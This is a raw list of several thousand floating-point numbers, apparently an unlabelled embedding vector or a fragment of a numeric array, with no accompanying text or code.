0.016633115708827972, 0.03358155116438866, 0.01161953154951334, -0.03572572395205498, 0.017531776800751686, 0.007031629793345928, 0.011130786500871181, 0.009191569872200489, -0.01094159483909607, -0.00055033148964867, 0.02164669893682003, -0.0035276394337415695, 0.016175901517271996, 0.006850321311503649, -0.013440503738820553, -0.019833611324429512, -0.013235545717179775, 0.0031394020188599825, 0.009246750734746456, -0.007961823605000973, -0.016506988555192947, -0.0004966285778209567, 0.005884654354304075, 0.006440405268222094, -0.02032235637307167, 0.019928207620978355, -0.017831331118941307, -0.006105378270149231, -0.017500244081020355, 0.03477976471185684, -0.0400456041097641, 0.014481058344244957, -0.014079025946557522, -0.016097072511911392, 0.002587592462077737, 0.02347555384039879, 0.02722785808146, -0.037018537521362305, 0.04269429296255112, 0.026896772906184196, 0.03790143132209778, -0.004406593274325132, 0.025241345167160034, -0.0032615885138511658, 0.013298609293997288, -0.028000392019748688, 0.05313137546181679, -0.03232027217745781, 0.013897716999053955, -0.012297469191253185, 0.007327242288738489, -0.012754683382809162, 0.022072380408644676, 0.018225479871034622, 0.018367374315857887, -0.024484576657414436, -0.009664549492299557, -0.007043454330414534, -0.011856021359562874, -0.016491221264004707, 0.00334238912910223, -0.008726473897695541, -0.02618730440735817, 0.016916902735829353, -0.008450568653643131, 0.028457606211304665, -0.003326623234897852, -0.007011922542005777, 0.005616632755845785, -0.028457606211304665, 0.012273820117115974, -0.022576892748475075, 0.0010055743623524904, -0.006282745394855738, -0.024216555058956146, 0.012076745741069317, -0.029971139505505562, -0.00016775995027273893, -0.009688198566436768, -0.016207434237003326, -0.04568982869386673, -0.0010977068450301886, 0.0024023421574383974, 0.03159503638744354, -0.0035907034762203693, -0.015348187647759914, 0.014079025946557522, -0.013022704981267452, 0.03493742644786835, -0.021772827953100204, -0.020259292796254158, 0.01216345839202404, 0.005395908840000629, 0.005900420248508453, -0.02615577168762684, -0.005458972882479429, -0.02133137919008732, 0.006436463911086321, -0.0030783088877797127, 0.029845012351870537, -0.020511548966169357, -0.010508029721677303, 0.03749151527881622, 0.015411252155900002, -0.00004101619924767874, -0.006274862680584192, 0.02724362537264824, 0.0022308870684355497, 0.012297469191253185, -0.006192091386765242, -0.0060541387647390366, -0.0005966440658085048, -0.02434268221259117, 0.007922408170998096, -0.009869507513940334, 0.02139444276690483, -0.007484902162104845, -0.02007010020315647, -0.06924421340227127, -0.00830079149454832, 0.025004854425787926, 0.04408169910311699, 0.0022919801995158195, -0.039541095495224, -0.009703964926302433, -0.009349229745566845, -0.01161953154951334, -0.0027728427667170763, 0.019675951451063156, -0.013921366073191166, -0.023081405088305473, 0.02888328768312931, 0.01110713742673397, 0.027401285246014595, -0.019297568127512932, -0.010342487134039402, -0.0246264711022377, -0.010397667996585369, -0.017279520630836487, 0.006645363289862871, -0.004051858559250832, 0.0021835891529917717, 0.0025304409209638834, -0.0038055148907005787, -0.002859555883333087, -0.0032891789451241493, -0.009309815242886543, 0.018556566908955574, 0.008828951977193356, -0.012029447592794895, -0.003904052311554551, 0.031216653063893318, 0.001638677204027772, 0.021016059443354607, -0.02349131926894188, 0.007875110022723675, -0.04830698296427727, 0.005738819018006325, -0.012210756540298462, -0.018903417512774467, -0.028158051893115044, 0.022324636578559875, -0.011777191422879696, 0.032730188220739365, 0.011934851296246052, -0.019439460709691048, -0.0006971522234380245, -0.018225479871034622, -0.01761060766875744, -0.004465715494006872, -0.0524376705288887, -0.01950252614915371, 0.0036715040914714336, -0.012447246350347996, -0.018588097766041756, -0.005056940019130707, 0.0005562436999753118, -0.016207434237003326, 0.03452751040458679, -0.00521065853536129, -0.011611648835241795, 0.01471754815429449, 0.0027432816568762064, -0.009893156588077545, 0.02937203273177147, -0.03875279426574707, 0.0027373693883419037, -0.005549627356231213, 0.013550865463912487, -0.006976448930799961, 0.007713508792221546, -0.0012386153684929013, 0.0068148477002978325, 0.03288784623146057, 0.020164696499705315, 0.012533959001302719, 0.007614971604198217, -0.009837975725531578, -0.01564774103462696, 0.03148467466235161, -0.007725333329290152, -0.005596925038844347, -0.013314375653862953, 0.028473371639847755, -0.008545164950191975, -0.01201368123292923, -0.0007242499850690365, 0.0041306884959340096, -0.02591928094625473, 0.007725333329290152, 0.01871422678232193, -0.006184208206832409, -0.0026250367518514395, -0.012612788937985897, 0.035095084458589554, -0.025194047018885612, -0.0192660354077816, -0.014142089523375034, -0.016743477433919907, -0.015229943208396435, -0.01683807373046875, 0.01295175775885582, -0.0008858513901941478, 0.006255154963582754, -0.01164318062365055, 0.00949112419039011, -0.019975503906607628, -0.016428157687187195, -0.010500147007405758, -0.011312095448374748, 0.013456269167363644, -0.005525978282094002, -0.014654484577476978, 0.02141021005809307, 0.0008996466058306396, 0.012352650053799152, -0.014867325313389301, 0.03135854750871658, -0.002238770015537739, -0.011115020141005516, 0.04833851382136345, -0.00034266387228854, 0.007918466813862324, 0.020369654521346092, -0.017563309520483017, 0.0010632186895236373, 0.024516109377145767, 0.015726571902632713, 0.006901560351252556, 0.00755584891885519, -0.014922506175935268, 0.0003389687044546008, 0.00923886802047491, 0.0017244047485291958, -0.0021717646159231663, -0.000842987559735775, 0.0002500386908650398, -0.00894719734787941, 0.003572966670617461, 0.00533678662031889, -0.007776572834700346, 0.004418417811393738, 0.007559790275990963, 0.012746799737215042, -0.0353473424911499, -0.004442066885530949, 0.03020763024687767, -0.008592462167143822, 0.006499527953565121, 0.026896772906184196, 0.03761764243245125, -0.0005936879315413535, 0.005939835216850042, 0.006806964520365, 0.033266231417655945, 0.006365517154335976, -0.02561972849071026, 0.013054236769676208, 0.007930290885269642, 0.014756963588297367, 0.015269357711076736, 0.005821590311825275, -0.00801700446754694, 0.010287306271493435, 0.013448386453092098, 0.00047297959099523723, 0.008387505076825619, 0.0025619727093726397, -0.00641281483694911, -0.0013282843865454197, 0.009104857221245766, -0.008892016485333443, -0.015600443817675114, 0.016128603368997574, -0.006535001564770937, 0.04786553606390953, 0.021299848333001137, -0.017043031752109528, -0.037050068378448486, -0.0029896250925958157, -0.0048913974314928055, -0.01567927375435829, 0.00460760947316885, -0.006432522553950548, -0.013732174411416054, -0.011044073849916458, -0.03708159923553467, 0.027385517954826355, 0.03181575983762741, -0.006243330426514149, 0.00508453045040369, -0.006830613594502211, 0.04146454483270645, -0.008332324214279652, 0.000985866878181696, 0.014220919460058212, -0.017531776800751686, 0.00949112419039011, -0.03184729442000389, 0.010019284673035145, 0.0050648231990635395, 0.019691716879606247, 0.0069882734678685665, 0.009026027284562588, -0.015726571902632713, 0.007366657257080078, -0.005352552514523268, 0.027054432779550552, -0.005395908840000629, -0.017200691625475883, 0.022797616198658943, -0.005931952502578497, 0.017815563827753067, -0.0033798334188759327, -0.009112739935517311, -0.07384788244962692, -0.011343627236783504, 0.010342487134039402, 0.012202873826026917, -0.0073784817941486835, 0.028977883979678154, 0.0021796475630253553, 0.03389687091112137, 0.007989414036273956, 0.011887554079294205, -0.030822504311800003, -0.036450959742069244, -0.024752598255872726, 0.016365094110369682, -0.0013322258600965142, -0.0035039905924350023, -0.012376299127936363, 0.006448288448154926, -0.03821675106883049, -0.008742239326238632, 0.013322258368134499, -0.003476399928331375, 0.015450666658580303, -0.006676895078271627, -0.0026408026460558176, 0.0015618180623278022, -0.003096045693382621, 0.01270738523453474, -0.037554580718278885, 0.012849278748035431, -0.0008937343372963369, -0.011138669215142727, 0.020243527367711067, 0.006065963301807642, 0.008781654760241508, -0.02218274213373661, -0.026092708110809326, -0.007055278867483139, -0.014827909879386425, -0.026297666132450104, 0.013479918241500854, 0.02565125934779644, -0.029308969154953957, 0.016026124358177185, 0.0033522427547723055, 0.018540799617767334, -0.018651161342859268, 0.01014541182667017, -0.018556566908955574, -0.004158278927206993, -0.015608326531946659, 0.029182840138673782, -0.0025994169991463423, 0.002364897867664695, 0.0008055433863773942, -0.014591420069336891, 0.0005769365816377103, 0.0074139549396932125, 0.006176325026899576, -0.013937132433056831, -0.02617153711616993, -0.008450568653643131, -0.006373399868607521, 0.01174565963447094, 0.02374357543885708, 0.009688198566436768, 0.0010287306504324079, 0.020763803273439407, 0.012636438012123108, 0.011919085867702961, -0.013038470409810543, 0.028189584612846375, 0.04669885337352753, -0.02271878719329834, 0.01455200556665659, -0.011012541130185127, -0.01732681877911091, 0.00923886802047491, 0.022923745214939117, -0.014378579333424568, -0.00015199396875686944, 0.02489449270069599, -0.0032832666765898466, -0.008371738716959953, -0.008214078843593597, -0.0139055997133255, -0.006286687217652798, -0.012573374435305595, -0.0003870057116728276, -0.012991173192858696, 0.0037680708337575197, -0.010381901636719704, -0.005805824417620897, -0.012226522900164127, 0.004950519651174545, 0.01161953154951334, 0.0012415713863447309, 0.00990103930234909, 0.017720969393849373, 0.013156715780496597, 0.011461872607469559, -0.003523698076605797, -0.002652627183124423, 0.004497247748076916, -0.007232646457850933, 0.03364461660385132, 0.016412392258644104, -0.011469755321741104, 0.004520896822214127, -0.003198524471372366, -0.0019461140036582947, -0.02700713463127613, 0.0190137792378664, -0.0001239723787875846, -0.0008277142769657075, -0.02695983648300171, -0.014039610512554646, -0.03392840176820755, 0.0026329196989536285, 0.0057427603751420975, -0.010452848859131336, 0.008198313415050507, 0.012533959001302719, -0.019124140962958336, 0.020416952669620514, -0.010342487134039402, -0.012778332456946373, 0.004552428610622883, 0.011990033090114594, 0.015174762345850468, 0.020921463146805763, -0.006818789057433605, 0.008036711253225803, 0.0156635083258152, 0.0160813070833683, -0.019723249599337578, 0.009301931597292423, -0.042095184326171875, 0.022277338430285454, 0.0010632186895236373, 0.004702205304056406, 0.017468713223934174, -0.030412588268518448, -0.02938779816031456, 0.006755725014954805, 0.0048913974314928055, 0.0094674751162529, -0.0037286558654159307, -0.007559790275990963, -0.014000196009874344, -0.005407733377069235, 0.017468713223934174, 0.012029447592794895, -0.02702290005981922, 0.004379002843052149, 0.01042131707072258, -0.010105997323989868, 0.008513632230460644, -0.01975478045642376, -0.009175804443657398, -0.0004547501739580184, -0.007721391972154379, -0.021473273634910583, 0.012084628455340862, 0.0012839424889534712, -0.0074139549396932125, 0.004497247748076916, -0.007772631477564573, -0.014126324094831944, -0.013921366073191166, 0.009104857221245766, -0.01202156487852335, -0.0026940128300338984, 0.01871422678232193, 0.004997817799448967, -0.021473273634910583, 0.011493404395878315, 0.015229943208396435, -0.005056940019130707, 0.025209812447428703, 0.02059037797152996, -0.0056284572929143906, -0.010902179405093193, -0.025509366765618324, 0.008687058463692665, 0.0006641421932727098, 0.018509268760681152, -0.03894198685884476, -0.011722010560333729, 0.025840451940894127, 0.016743477433919907, -0.0009735496714711189, -0.006665070541203022, 0.00635369261726737, -0.0014199241995811462, -0.017579074949026108, 0.024437278509140015, 0.0032517346553504467, 0.002043666085228324, 0.01869845949113369, -0.0023156292736530304, 0.0069094435311853886, 0.006274862680584192, 0.012226522900164127, 0.0062669795006513596, -0.0006597079918719828, -0.016365094110369682, -0.010011401027441025, 0.0011075605871155858, 0.014654484577476978, -0.012368416413664818, -0.008206196129322052, 0.0006621714564971626, 0.012305352836847305, 0.0009469445794820786, 0.006739959120750427, -0.01981784589588642, 0.010161178186535835, 0.019423695281147957, -0.0036537672858685255, -0.019281800836324692, -0.005912244785577059, -0.01549008209258318, -0.010476497933268547, -0.039162710309028625, 0.0010809554951265454, 0.013046354055404663, -0.02807922102510929, 0.02109489031136036, -0.020779570564627647, -0.0015026956098154187, 0.007268119603395462, -0.022561127319931984, 0.030239161103963852, -0.0021658523473888636, -0.002581680193543434, -0.00527372257784009, -0.03228874132037163, 0.0465727224946022, -0.003827193286269903, -0.005947718396782875, -0.013811004348099232, -0.018572332337498665, -0.008068243972957134, 0.008056418970227242, 0.02163093350827694, 0.009806443937122822, 0.012265937402844429, -0.01093371119350195, 0.0016830191016197205, -0.018383139744400978, 0.016223199665546417, 0.010760285891592503, 0.030144566670060158, 0.0014110557967796922, -0.004438125062733889, -0.0008878221269696951, -0.03232027217745781, -0.01482002716511488, 0.004481481853872538, 0.013921366073191166, -0.016207434237003326, -0.010594743303954601, -0.009837975725531578, 0.008111599832773209, -0.0051988339982926846, -0.029009414836764336, 0.015568912029266357, -0.03203648328781128, -0.0010435112053528428, 0.01066568959504366, -0.02007010020315647, -0.0029167074244469404, -0.017784032970666885, -0.013503567315638065, -0.0019539969507604837, 0.011714127846062183, 0.0017450975719839334, -0.012652204371988773, 0.002627007430419326, 0.0011538731632754207, -0.006326102185994387, 0.017027264460921288, -0.010657806880772114, 0.000025573539460310712, -0.005474738776683807, -0.002282126573845744, -0.02967158704996109, -0.005632398650050163, -0.006239389069378376, 0.0141578558832407, 0.02032235637307167, 0.0007705625612288713, 0.024973321706056595, 0.01310153491795063, 0.013550865463912487, 0.00026432660524733365, 0.006223623175173998, 0.000712425506208092, -0.0005261898040771484, -0.012265937402844429, -0.011926968581974506, 0.008734356611967087, 0.02111065573990345, -0.0232863612473011, -0.021772827953100204, -0.007540083024650812, 0.0189349502325058, -0.018398907035589218, -0.001147960894741118, -0.007043454330414534, 0.0006237418274395168, -0.010476497933268547, -0.004099156707525253, -0.0045011891052126884, -0.01902954652905464, 0.027070198208093643, 0.01975478045642376, 0.0015155054861679673, 0.0006030490039847791, -0.006586241070181131, 0.014867325313389301, 0.004122805316001177, 0.006885794457048178, 0.02323906309902668, -0.0016761213773861527, 0.015695039182901382, -0.005845239385962486, 0.007855402305722237, -0.006105378270149231, 0.01067357324063778, 0.015103815123438835, 0.01280986424535513, -0.0001602464762981981, -0.019297568127512932, -0.010697221383452415, 0.016664648428559303, 0.01634932868182659, 0.012762566097080708, -0.027842732146382332, 0.025998111814260483, 0.008592462167143822, 0.000922802893910557, 0.00031260994728654623, -0.010129646398127079, -0.0058807129971683025, 0.0032004951499402523, 0.001971733756363392, -0.01362181268632412, 0.0044617741368710995, 0.007859344594180584, -0.010247890837490559, -0.010917945764958858, 0.009688198566436768, -0.0057033454068005085, 0.008292908780276775, -0.0015017101541161537, -0.0017362292855978012, -0.013125183992087841, -0.00005080835398985073, -0.01600247621536255, 0.011832373216748238, -0.021000294014811516, 0.003058601403608918, -0.00038799108006060123, -0.012250171042978764, -0.024926025420427322, 0.013211896643042564, 0.02300257422029972, 0.000002428793322906131, 0.018871886655688286, -0.006239389069378376, -0.013897716999053955, -0.009262517094612122, -0.0010504088131710887, -0.009830093011260033, 0.004650965798646212, 0.0009927644859999418, 0.002154027810320258, 0.0095068896189332, -0.002155998721718788, -0.01679077558219433, -0.014102675020694733, 0.01201368123292923, -0.013976546935737133, 0.010011401027441025, 0.017263755202293396, -0.00521065853536129, -0.0028339361306279898, 0.01066568959504366, -0.007697742898017168, 0.008036711253225803, -0.000142632910865359, 0.0005587071646004915, -0.023175999522209167, -0.003596615744754672, 0.004103098064661026, 0.008064301684498787, 0.01538760308176279, 0.00433958787471056, 0.006889736279845238, -0.009853741154074669, 0.0075913225300610065, -0.006858204025775194, 0.01872999221086502, 0.022844914346933365, -0.01658581756055355, -0.013148833066225052, 0.0025757679250091314, -0.0069094435311853886, -0.008537281304597855, 0.0016899167094379663, -0.015190527774393559, 0.025067918002605438, 0.019549822434782982, 0.003939525689929724, 0.00897084642201662, 0.004580019041895866, -0.034590575844049454, 0.011682596057653427, -0.01740564964711666, 0.011832373216748238, -0.011312095448374748, -0.019108375534415245, -0.0065231770277023315, 0.0019855289719998837, -0.017216457054018974, -0.013700642623007298, 0.024689534679055214, 0.004859865177422762, 0.008214078843593597, -0.007488843519240618, -0.012731034308671951, 0.02109489031136036, 0.0013056207681074739, 0.0015105785569176078, 0.03670321777462959, -0.008056418970227242, -0.006223623175173998, 0.01297540683299303, -0.010768168605864048, 0.012108277529478073, 0.006885794457048178, 0.002073227195069194, 0.014567771926522255, 0.005983192007988691, -0.013424737378954887, -0.019187206402420998, -0.003833105554804206, 0.011185967363417149, -0.0009370908373966813, -0.029513927176594734, -0.014417994767427444, 0.0048165088519454, 0.0002250348188681528, 0.007000098004937172, 0.013125183992087841, 0.006732076406478882, -0.013401088304817677, 0.020243527367711067, -0.008044594898819923, -0.006069904658943415, -0.010460731573402882, 0.00018352593178860843, 0.013669109903275967, -0.004741620272397995, -0.009443826042115688, -0.016743477433919907, 0.008482100442051888, 0.001608130638487637, 0.0006345809670165181, -0.010058699175715446, -0.010035050101578236, -0.010437083430588245, -0.027196327224373817, 0.0017470683669671416, 0.014914623461663723, -0.03238333761692047, 0.030302226543426514, -0.013566630892455578, 0.00007507319241994992, -0.025966579094529152, -0.013133066706359386, -0.003521727165207267, 0.016964200884103775, -0.001806190819479525, 0.0049308123998343945, -0.004166162107139826, -0.00867917574942112, -0.0020692856051027775, 0.009601485915482044, -0.0009331493056379259, 0.00897084642201662, 0.019991271197795868, 0.006605948321521282, -0.0022230041213333607, 0.00681090634316206, -0.009223101660609245, -0.0009804472792893648, -0.01712186075747013, -0.006873969919979572, 0.003096045693382621, 0.007532199844717979, 0.003127577481791377, 0.005013583693653345, -0.004954461473971605, -0.005439265165477991, 0.018572332337498665, 0.007622854318469763, 0.0019273918587714434, 0.012305352836847305, 0.0037562462966889143, 0.00035103954724036157, 0.0021757062058895826, 0.009333464317023754, -0.009325580671429634, 0.0031965537928044796, -0.029498159885406494, -0.03323470056056976, -0.0026013876777142286, -0.006058080121874809, -0.03708159923553467, -0.010823349468410015, -0.004737678915262222, 0.0073508913628757, -0.008892016485333443, -0.010303071700036526, -0.008119483478367329, -0.010886413976550102, 0.0014770758571103215, 0.003775953780859709, 0.025194047018885612, -0.006661129184067249, 0.0007971677114255726, -0.019928207620978355, -0.010074465535581112, -0.013133066706359386, -0.008253494277596474, -0.05962695926427841, -0.016696179285645485, -0.00036040059057995677, 0.0175948403775692, -0.02407466061413288, 0.0008804317913018167, 0.004611550830304623, -0.015521613880991936, 0.015395485796034336, -0.006692661438137293, 0.006420698016881943, 0.01767367124557495, -0.02219850942492485, -0.018052054569125175, -0.013550865463912487, -0.003754275618121028, -0.02193048782646656, 0.0001160278043244034, 0.005005700513720512, 0.004446008242666721, -0.021962018683552742, -0.0013844507047906518, -0.007544024381786585, 0.0033463307190686464, -0.0018879768904298544, 0.028457606211304665, 0.014630835503339767, -0.027653539553284645, 0.01351145002990961, -0.03127971664071083, -0.019644418731331825, -0.004193752538412809, -0.022671489045023918, -0.012329000979661942, 0.016664648428559303, 0.028173817321658134, -0.00440265191718936, 0.005281605292111635, 0.010523796081542969, -0.000024680542992427945, -0.0031788169872015715, -0.0016179843805730343, 0.001536198309622705, 0.0004586916766129434, 0.016191668808460236, 0.010870647616684437, 0.003984853159636259, -0.00906544178724289, -0.003775953780859709, -0.01270738523453474, -0.010184827260673046, -0.017516011372208595, 0.01588423177599907, 0.013542982749640942, 0.02000703662633896, -0.005951659753918648, -0.011446106247603893, 0.006688719615340233, 0.0021914721000939608, 0.01187178771942854, -0.010705105029046535, 0.003986823838204145, -0.018635395914316177, 0.021962018683552742, 0.014851558953523636, 0.005080589093267918, -0.009223101660609245, -0.009002378210425377, 0.015253592282533646, 0.005711228586733341, -0.013204013928771019, -0.014504707418382168, -0.018398907035589218, -0.0006069904775358737, -0.018367374315857887, -0.01204521395266056, 0.02163093350827694, 0.021741295233368874, 0.004725854378193617, 0.016664648428559303, 0.0010031108977273107, 0.019896674901247025, -0.01978631317615509, 0.0020456367637962103, -0.006657187826931477, -0.005502329207956791, 0.0016524724196642637, -0.005017525050789118, 0.004087332170456648, -0.005167302209883928, -0.002502850256860256, -0.007299651857465506, 0.008576696738600731, 0.00024868379114195704, -0.01891918294131756, -0.023444021120667458, 0.008229845203459263, 0.008340206928551197, -0.0028950292617082596, 0.0021244667004793882, 0.01874575763940811, 0.0026072999462485313, -0.009191569872200489, 0.01189543679356575, 0.0018623571377247572, 0.014827909879386425, -0.0027669307310134172, -0.0038606959860771894, 0.010500147007405758, 0.015229943208396435, 0.0008336265455000103, 0.01709032990038395, 0.004059741739183664, 0.0011942734709009528, 0.0012868986232206225, 0.0038941986858844757, 0.006227564532309771, -0.009420176967978477, 0.004552428610622883, -0.0443970188498497, 0.01521417684853077, -0.019880909472703934, 0.004134629853069782, 0.02409042790532112, 0.014228803105652332, -0.009033909998834133, -0.013976546935737133, 0.01735835149884224, -0.013164598494768143, -0.01548219844698906, -0.010578976944088936, 0.012526076287031174, -0.01819394901394844, 0.011020424775779247, -0.010736636817455292, 0.002841819077730179, 0.0011105167213827372, 0.0034153067972511053, -0.015576794743537903, -0.007626796141266823, -0.008742239326238632, -0.009932571090757847, -0.0003764129360206425, -0.0009006320033222437, 0.0030921041034162045, 0.0012139809550717473, -0.005801883060485125, -0.010484380647540092, 0.008931430988013744, 0.01240783091634512, 0.009743379428982735, -0.0020535197108983994, 0.006105378270149231, -0.0020357829052954912, -0.008655526675283909, 0.0027846673037856817, 0.0031729047186672688, -0.011446106247603893, -0.021977785974740982, 0.007914525456726551, -0.012628555297851562, -0.00855304766446352, 0.0012888694182038307, -0.020401187241077423, -0.019155673682689667, 0.005510212387889624, -0.023128701373934746, -0.005187009461224079, -0.006188149563968182, -0.029718885198235512, -0.00627092132344842, -0.004311997443437576, 0.01135150995105505, -0.015568912029266357, -0.012983289547264576, -0.027369752526283264, 0.011304212734103203, 0.011777191422879696, -0.0022289163898676634, -0.017452947795391083, 0.006243330426514149, 0.026581453159451485, -0.009593603201210499, -0.017579074949026108, -0.020353889092803, 0.01980207860469818, -0.005384084302932024, -0.020432718098163605, -0.011926968581974506, -0.006613831501454115, 0.015718689188361168, -0.009640900418162346, -0.020700739696621895, 0.03358155116438866, -0.007295710034668446, -0.012029447592794895, -0.0017667758511379361, 0.01709032990038395, 0.0016771068330854177, -0.0023077463265508413, 0.027101730927824974, -0.007469136267900467, -0.0061723836697638035, 0.0027038666885346174, 0.020952995866537094, -0.00841115415096283, 0.0020456367637962103, 0.03241486847400665, 0.02481566183269024, 0.005908303428441286, -0.004572135861963034, -0.008434802293777466, 0.000708976702298969, -0.004390827380120754, 0.018556566908955574, -0.014268217608332634, -0.004292289726436138, -0.014165738597512245, 0.006771491374820471, 0.05082954093813896, 0.026234600692987442, -0.009262517094612122, -0.008828951977193356, -0.00007125487172743306, 0.023175999522209167, 0.014788495376706123, -0.01896648108959198, 0.036797814071178436, 0.016759242862462997, -0.002701896009966731, -0.00009200930799124762, 0.0009021100122481585, 0.00023685931228101254, 0.022009316831827164, -0.0036793870385736227, 0.009948337450623512, 0.012573374435305595, 0.007429721299558878, 0.019628653302788734, -0.020495781674981117, 0.0034330436028540134, 0.01241571456193924, -0.013322258368134499, -0.011737776920199394, -0.008687058463692665, 0.0024890550412237644, -0.012967524118721485, 0.009372878819704056, 0.00906544178724289, -0.012928108684718609, 0.017452947795391083, -0.00701586389914155, 0.021299848333001137, -0.002447669394314289, 0.02030659094452858, 0.0015647741965949535, -0.004375061020255089, 0.008631877601146698, -0.011990033090114594, 0.015474315732717514, -0.009175804443657398, 0.0048913974314928055, -0.009774911217391491, 0.012210756540298462, 0.013338024728000164, -0.0004483452357817441, -0.02560396119952202, 0.019108375534415245, 0.0008981685386970639, 0.017784032970666885, 0.01686960458755493, -0.02803192473948002, 0.035095084458589554, 0.007654386572539806, -0.005616632755845785, 0.026376495137810707, 0.021016059443354607, 0.0037818660493940115, -0.015222059562802315, 0.016191668808460236, 0.0058255321346223354, -0.009443826042115688, -0.009672433137893677, 0.01228958647698164, 0.007181406952440739, 0.014220919460058212, 0.007149874698370695, -0.009569954127073288, 0.007737157866358757, 0.006720251869410276, -0.014536239206790924, -0.013456269167363644, -0.015576794743537903, 0.0015815255464985967, -0.009136389009654522, -0.00797364767640829, -0.00448542321100831, 0.02275031805038452, -0.005060881841927767, 0.0006690690643154085, 0.002723574172705412, 0.01606553979218006, 0.009727614000439644, -0.01094159483909607, -0.023980066180229187, 0.01633356139063835, -0.011272680014371872, 0.004319880157709122, 0.01175354328006506, 0.03044411912560463, 0.014827909879386425, -0.01844620332121849, 0.014985569752752781, 0.018335841596126556, -0.0034153067972511053, 0.004647024441510439, 0.009987751953303814, -0.026061175391077995, -0.018304310739040375, 0.009230985306203365, -0.0010257745161652565, 0.00026851444272324443, -0.0019047282403334975, -0.023696277290582657, 0.007603147067129612, 0.004272582475095987, -0.00960936862975359, 0.005340727977454662, -0.0036143523175269365, -0.009041793644428253, -0.009278283454477787, -0.0017165218014270067, 0.02191472053527832, 0.020196229219436646, -0.013542982749640942, 0.002591534052044153, -0.021772827953100204, -0.016254732385277748, 0.008789537474513054, 0.007808104623109102, 0.025966579094529152, 0.0029088244773447514, 0.0019382309401407838, -0.009987751953303814, -0.016459690406918526, 0.01016906090080738, -0.013014822266995907, -0.030649077147245407, -0.005080589093267918, -0.005912244785577059, 0.006235447712242603, 0.004524838179349899, 0.00923886802047491, -0.003651796607300639, 0.016680413857102394, -0.004014414269477129, 0.018052054569125175, -0.028236880898475647, -0.006495586596429348, 0.0019145819824188948, 0.00010678992111934349, 0.01201368123292923, -0.0026940128300338984, 0.008584579452872276, -0.015032867901027203, -0.01014541182667017, 0.006605948321521282, 0.0025639436207711697, -0.0016642969567328691, -0.0045011891052126884, -0.008340206928551197, -0.010255774483084679, 0.001077013905160129, -0.016711944714188576, 0.0008375680190511048, 0.0009868522174656391, -0.002177676884457469, -0.01044496614485979, 0.000578414648771286, 0.00029240979347378016, -0.006925209425389767, -0.003269471460953355, -0.002597446320578456, 0.03184729442000389, -0.013416854664683342, -0.015466433018445969, -0.003111811587586999, 0.017153393477201462, -0.00009028490603668615, 0.019943973049521446, -0.006724193226546049, 0.005254014860838652, -0.0006439419812522829, 0.01737411692738533, 0.021709762513637543, 0.00830079149454832, -0.008119483478367329, -0.015608326531946659, -0.0002379678626311943, -0.0054550315253436565, 0.014630835503339767, 0.004934753756970167, -0.011800840497016907, -0.013566630892455578, -0.003182758577167988, -0.00406762445345521, -0.00017096241936087608, 0.011398808099329472, -0.005675754975527525, 0.006152676418423653, 0.01709032990038395, -0.011517053470015526, -0.0006173368892632425, -0.00747307762503624, -0.019691716879606247, -0.013164598494768143, -0.023885469883680344, 0.006136910058557987, -0.005301313009113073, -0.0095068896189332, -0.0016101013170555234, 0.010105997323989868, 0.0144495265558362, -0.009948337450623512, 0.01391348335891962, -0.012194990180432796, -0.0017096241936087608, -0.00635369261726737, 0.01896648108959198, -0.01016906090080738, 0.0092152189463377, -0.007508551236242056, -0.007193231489509344, 0.014244568534195423, -0.014496824704110622, -0.003563113044947386, -0.009428059682250023, -0.00945959147065878, 0.01683807373046875, -0.0021816184744238853, -0.011785075068473816, -0.01735835149884224, -0.014883090741932392, -0.04010866954922676, -0.019045311957597733, -0.030570248141884804, -0.02215121127665043, 0.0037325972225517035, 0.001969762844964862, 0.026281898841261864, 0.00472979573532939, -0.010129646398127079, -0.017831331118941307, 0.004552428610622883, 0.005037232767790556, -0.005971367470920086, 0.003720772685483098, 0.015829050913453102, -0.0027255448512732983, -0.00016874531866051257, 0.015497964806854725, 0.0013913483126088977, 0.002666422398760915, -0.019092610105872154, -0.00041804497595876455, -0.0017490391619503498, -0.006661129184067249, -0.021457508206367493, -0.0025994169991463423, -0.014410112053155899, -0.011264797300100327, -0.0009991694241762161, 0.013456269167363644, -0.006503469310700893, -0.00002107776890625246, 0.0006592153222300112, 0.007733216509222984, -0.0013075914466753602, 0.002542265225201845, 0.01589999720454216, -0.02088993228971958, -0.0019342894665896893, -0.019943973049521446, -0.02322329767048359, -0.004280465189367533, 0.0006735032075084746, -0.006404932122677565, 0.020905697718262672, -0.021489039063453674, -0.007859344594180584, -0.029971139505505562, 0.0037325972225517035, -0.02513098157942295, 0.005403792019933462, -0.02297104150056839, 0.0029580933041870594, -0.007772631477564573, 0.01295175775885582, -0.0145756546407938, -0.009617251344025135, -0.008103717118501663, 0.007737157866358757, -0.003925730474293232, -0.019076842814683914, -0.010460731573402882, 0.0025757679250091314, -0.010736636817455292, -0.014063259586691856, -0.008892016485333443, 0.0022840972524136305, 0.02382240630686283, -0.011564350686967373, 0.026234600692987442, 0.0030211571138352156, -0.027180559933185577, -0.017232222482562065, -0.013180364854633808, -0.022371934726834297, 0.007386364508420229, 0.0017391854198649526, 0.017720969393849373, 0.035977981984615326, 0.0053564938716590405, -0.01787862926721573, -0.01053956151008606, -0.001797322416678071, -0.012273820117115974, -0.02539900504052639, -0.009160038083791733, -0.011154435575008392, -0.014756963588297367, -0.023049872368574142, -0.0005764438537880778, -0.015758102759718895, 0.018288543447852135, 0.00855304766446352, 0.009041793644428253, 0.010121763683855534, -0.00695674167945981, 0.0029797714669257402, -0.000011385690413590055, -0.007102577015757561, 0.01735835149884224, 0.00028354141977615654, 0.04083390533924103, -0.023097170516848564, 0.027401285246014595, -0.016932670027017593, 0.006002899259328842, -0.0027728427667170763, 0.01137515902519226, -0.0071222842670977116, 0.008442685939371586, 0.038626667112112045, 0.02218274213373661, 0.008718590252101421, -0.003166992450132966, 0.005821590311825275, -0.0045997267588973045, -0.01095736026763916, 0.0019490700215101242, 0.006751783657819033, 0.009049676358699799, 0.004702205304056406, 0.01135939359664917, -0.006164500489830971, -0.0027905795723199844, -0.01634932868182659, -0.0336761474609375, -0.005600866861641407, -0.002382634673267603, 0.0087974201887846, -0.0052382489666342735, 0.0046351999044418335, 0.018004756420850754, 0.006408873479813337, -0.010500147007405758, -0.0009834034135565162, -0.01174565963447094, 0.00973549671471119, 0.012060979381203651, 0.015395485796034336, 0.00467067351564765, -0.029845012351870537, 0.0032576469238847494, 0.02163093350827694, 0.016428157687187195, 0.0064285811968147755, -0.004666732158511877, -0.022356169298291206, 0.0013322258600965142, 0.010681455954909325, 0.017184924334287643, -0.017452947795391083, 0.010247890837490559, 0.03269865736365318, 0.01536395400762558, -0.01321977935731411, 0.0033207109663635492, 0.01255760807543993, 